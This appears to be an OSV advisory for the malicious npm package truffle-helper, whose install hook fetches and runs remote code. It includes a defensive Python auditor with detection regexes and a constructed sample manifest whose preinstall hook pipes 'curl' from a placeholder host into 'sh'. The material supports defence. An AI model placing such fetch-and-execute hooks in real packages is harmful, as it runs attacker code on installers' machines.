MAL-2026-3716

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/truffle-helper/MAL-2026-3716.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3716
Published
2026-05-13T11:53:21Z
Modified
2026-05-15T07:51:38.581957Z
Summary
Malicious code in truffle-helper (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (27652f23529349a6999e9121bc9714a5e9b5d11b227729c3c24147e5d2260eee)

package.json line 7 invokes require('child_process') and execSync('curl...') from an npm lifecycle script. This causes the installer's machine to fetch and execute remote content at install time, without user consent and without any visible integrity check. The package's declared purpose (a Truffle helper) has no legitimate need to pipe curl output through a shell during install. Any installer running npm install truffle-helper runs attacker-controlled commands on their host.
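The two checks a defender wants from this description are (a) whether a package manifest carries an install-time lifecycle hook that fetches and executes remote content, and (b) whether a tarball on hand is the artifact the advisory lists (via the sha512 SRI string under package_integrity). The script below is an added example, not the advisory's or the OpenSSF project's own tooling: the manifests it inspects are constructed stand-ins (the real package.json is not reproduced here), the hook list and regexes are the author's assumptions about what "fetch and pipe through a shell" looks like, and the URL is a placeholder.

```python
import base64
import hashlib
import json
import re

# Hooks npm runs on its own during `npm install`; the installer never types these.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristics (assumed, not from the advisory) for "fetch remote content and run it".
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|node|python\d?)\b"),
     "remote content piped into an interpreter"),
    (re.compile(r"child_process"), "child_process usage in an install hook"),
    (re.compile(r"\bexec(?:Sync)?\b|\bspawn(?:Sync)?\b"),
     "shell execution primitive in an install hook"),
    (re.compile(r"\b(curl|wget)\b"), "network fetch during install"),
]


def audit_lifecycle_scripts(package_json_text):
    """Return one finding per lifecycle hook whose script matches any heuristic.

    Each finding is {"hook": ..., "script": ..., "reasons": [...]}; an empty
    list means no install-time hook looked like fetch-and-execute.
    """
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not isinstance(script, str):
            continue
        reasons = [reason for pattern, reason in SUSPICIOUS if pattern.search(script)]
        if reasons:
            findings.append({"hook": hook, "script": script, "reasons": reasons})
    return findings


def sri_sha512(data):
    """Subresource-Integrity form of SHA-512, as used by npm's 'integrity' field."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def matches_advisory_tarball(tarball_bytes, advisory_sri):
    """True when the tarball on disk is exactly the artifact the advisory hashed."""
    return sri_sha512(tarball_bytes) == advisory_sri


# Constructed sample manifests (not the real package contents). The first mirrors
# the pattern the advisory describes; the second has an ordinary postinstall hook.
CONSTRUCTED_MALICIOUS_MANIFEST = json.dumps({
    "name": "example-helper",
    "version": "0.0.0",
    "scripts": {
        "preinstall": "node -e \"require('child_process').execSync("
                      "'curl -s https://example.invalid/x | sh')\"",
        "test": "mocha",
    },
})
CONSTRUCTED_BENIGN_MANIFEST = json.dumps({
    "name": "example-clean",
    "version": "0.0.0",
    "scripts": {"build": "tsc", "postinstall": "node scripts/setup.js"},
})

if __name__ == "__main__":
    for finding in audit_lifecycle_scripts(CONSTRUCTED_MALICIOUS_MANIFEST):
        print(finding["hook"], "->", "; ".join(finding["reasons"]))
    print(audit_lifecycle_scripts(CONSTRUCTED_BENIGN_MANIFEST))  # []
```

To compare a downloaded tarball against this advisory, read the .tgz bytes and pass them with the listed `sha512_sri` value to matches_advisory_tarball. The audit is a heuristic pre-install gate, not a replacement for disabling hooks outright: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents any lifecycle hook from running, which is the mitigation that removes this class of install-time execution regardless of what the script contains.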

Source: ossf-package-analysis (a7ffc14f56f1b088e2835429bbdd7f07020e022594b7f123c7c58c2c12602996)

The OpenSSF Package Analysis project identified 'truffle-helper' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-13T21:58:24.364674851Z",
            "sha256": "a7ffc14f56f1b088e2835429bbdd7f07020e022594b7f123c7c58c2c12602996",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T12:00:42Z",
            "versions": [
                "2.0.0"
            ]
        },
        {
            "import_time": "2026-05-13T21:58:24.101332882Z",
            "sha256": "ded99697b86f732b606078ad916a3515388c413bb5180025886ef084b52ab8dd",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T11:53:21Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-002711",
            "import_time": "2026-05-15T07:37:17.681320272Z",
            "sha256": "27652f23529349a6999e9121bc9714a5e9b5d11b227729c3c24147e5d2260eee",
            "source": "amazon-inspector",
            "modified_time": "2026-05-14T19:25:17Z",
            "versions": [
                "2.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / truffle-helper

Package: npm / truffle-helper

Affected ranges    Affected versions
1.*                1.0.0
2.*                2.0.0

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "0d3e34f95fcde907f6cf11e7ac954fbfa36d4308be6dc3ecf6911f7c336ad400",
            "tlsh": "0011f11ecb240eb32ec41a552d291989b177846b0b00bc54f2bb421dc34d5ff89ff64a"
        }
    ],
    "package_integrity": [
        {
            "filename": "truffle-helper-2.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-uudykehREigi5mJLOMYMAchRX1UtnquaX9J+i9NqQEPyG2/As6605GXA89b/tGKixvToSqtf18LfPdOaxcDtLw==",
                "sha1": "5a0a7fda5de6389df808e5f0bea762920cb3e6f6"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/truffle-helper/MAL-2026-3716.json"